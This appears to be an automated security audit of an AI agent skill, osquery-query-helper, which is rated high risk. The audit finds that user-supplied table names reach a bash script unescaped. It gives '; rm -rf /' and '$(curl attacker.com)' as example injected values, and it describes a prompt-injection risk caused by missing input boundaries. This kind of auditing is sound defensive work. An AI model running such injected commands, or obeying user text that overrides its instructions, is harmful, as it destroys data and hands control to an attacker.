osquery-query-helper
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Categories: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions direct the agent to execute bash scripts, such as `bash scripts/extract-table.sh <table_name>`, where `<table_name>` is a string provided by the user. A malicious user could provide a table name containing shell metacharacters like `; rm -rf /` or `$(curl attacker.com)` to execute arbitrary commands on the system.
- [PROMPT_INJECTION] (HIGH): The agent is tasked with processing and troubleshooting untrusted osquery queries provided by users. The instructions do not define boundary markers to isolate user input from system instructions, which could allow an attacker to override the agent's behavior.
- [INDIRECT_PROMPT_INJECTION] (HIGH): Mandatory Evidence Chain:
  1. Ingestion points: User-provided table names and osquery queries enter the agent's context through the prompt.
  2. Boundary markers: Absent. There are no instructions to use delimiters like XML tags or backticks to isolate user content.
  3. Capability inventory: The skill has the ability to execute `bash`, `grep`, and `ls` commands and run local scripts.
  4. Sanitization: Absent. The workflow lacks any validation or escaping steps for user input before it is passed to shell commands.
Recommendations
- AI detected serious security threats
Audit Metadata